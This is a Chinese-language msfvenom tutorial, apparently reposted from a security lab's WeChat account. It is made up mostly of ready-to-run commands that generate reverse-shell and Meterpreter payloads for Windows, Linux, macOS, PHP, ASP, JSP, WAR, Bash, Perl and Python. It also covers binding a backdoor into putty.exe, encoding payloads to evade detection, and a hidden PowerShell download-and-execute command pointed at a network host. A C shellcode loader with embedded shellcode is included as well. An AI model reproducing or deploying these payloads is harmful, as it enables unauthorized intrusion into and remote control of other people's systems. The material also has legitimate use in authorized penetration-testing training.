现在metasploit framwork主要包括了msfconsole和msfvenom两个部分,msfconsole提供了一个一体化的集中控制台。通过msfconsole,我们可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线,从而拿到远程主机shellcode。
msfvenom参数说明:
msfvenom生成shellcode:
实例1:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe-p 指定payload,payload后跟该payload的选项-o 指定payload的保存路径,包含文件名
实例2(替换指定代码):msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -b 'x00' -f exe -o shell.exe-b 替换代码中会出现中断的字符,如 'x00xff'
实例3(指定编码器):msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -b 'x00' -e x86/shikata_ga_nai -f exe -o shell.exe-e 指定特定的编码器
实例4(绑定后门到其他可执行程序上):msfvenom -p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -x /Users/bikhoff/putty.exe -k -f exe -o /Users/birkhoff/puuty_bind.exe-p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> 指定payload和payload的参数-x /Users/birkhoff/putty.exe执行要绑定的软件-k从原始的注文件中分离出来,单独创建一个进程-f exe指定输出格式-o /Users/birkhoff/puuty_bind.exe指定输出路径
实例5 Windowsmsfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exemsfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe
实例6 Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
实例7 MACmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
实例8 PHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
实例9 Aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
实例10 Aspxmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
实例11 JSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
实例12 Warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
实例13 Bashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh
实例14 Perlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
实例15 Pythonmsfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
实例16 exe 利用exec执行powershell后门msfvenom -p windows/exec CMD="powershell.exe -nop -w hidden -c M.proxy=[Net.WebRequest]::GetSystemWebProxy();M.downloadstring('http://192.168.0.104:8080/4WFjDXrGo7Mj');" -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe
实例17 输出c格式 在vs中编译生成
msfvenom -p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c
生成C版本的shellcode 放入vs工程中 编译生成exe文件
include "windows.h"include "stdio.h"unsigned char shellcode[]="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52" "x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1" "x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b" "x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03" "x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b" "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24" "x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb" "x8dx5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4c" "x77x26x07xffxd5x31xdbx53x53x53x53x53x68x3ax56" "x79xa7xffxd5x53x53x6ax03x53x53x68xb3x15x00x00" "xe8x6ax01x00x00x2fx57x65x56x69x48x48x4ex41x6f" "x4fx51x36x76x54x75x38x59x37x52x73x4dx41x38x68" "x72x6ax33x30x67x39x42x41x6cx42x35x66x45x68x33" "x66x2dx65x68x69x6ex46x42x33x45x4dx59x59x79x7a" "x46x34x53x34x6cx50x74x4fx57x6ax4ex63x46x6bx6f" "x73x47x6ex70x53x50x53x6ex33x64x73x53x7ax6ex2d" "x41x2dx50x56x39x74x2dx6fx58x4fx56x45x30x47x55" "x61x63x34x61x41x68x42x53x67x57x58x69x6cx71x52" "x33x6bx6bx59x59x56x63x42x4dx37x75x79x4fx70x38" "x45x5fx4dx70x44x30x35x39x4bx4bx6bx4bx49x6cx6a" "x48x51x50x2dx4dx32x75x64x4ex58x47x63x51x35x5a" "x4bx49x41x42x43x59x6fx55x72x53x77x34x4ex59x35" "x48x46x41x49x78x63x63x41x69x73x6cx43x4cx44x76" "x57x5fx77x64x32x67x39x68x4dx51x54x31x39x50x50" "x50x53x41x41x4fx51x55x6bx68x4ex63x56x46x7ax2d" "x4cx4ax47x38x52x58x38x61x6fx4cx6bx2dx4bx34x77" "x46x48x72x00x50x68x57x89x9fxc6xffxd5x89xc6x53" "x68x00x02x60x84x53x53x53x57x53x56x68xebx55x2e" "x3bxffxd5x96x6ax0ax5fx53x53x53x53x56x68x2dx06" "x18x7bxffxd5x85xc0x75x14x68x88x13x00x00x68x44" "xf0x35xe0xffxd5x4fx75xe1xe8x4cx00x00x00x6ax40" "x68x00x10x00x00x68x00x00x40x00x53x68x58xa4x53" "xe5xffxd5x93x53x53x89xe7x57x68x00x20x00x00x53" "x56x68x12x96x89xe2xffxd5x85xc0x74xcfx8bx07x01" "xc3x85xc0x75xe5x58xc3x5fxe8x7fxffxffxffx31x39" "x32x2ex31x36x38x2ex31x31x34x2ex31x34x30x00xbb" "xf0xb5xa2x56x6ax00x53xffxd5"; void main() { LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, shellcode, sizeof(shellcode)); ((void(*)())Memory)(); }
msf设置监听
当目标主机执行反弹式shellcode后,会回连当前机器 ,需要设置端口监听。
以实例5为例:
生成test.ext文件
设置监听:
目标机上执行test.exe:
已反弹shell:
以实例8为例:
生成shell.php文件
设置监听:
上传shell.php:
触发shell.php,界面无反应
已反弹shell:
原文始发于微信公众号(CTS纵横安全实验室):msfvenom简单使用教程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论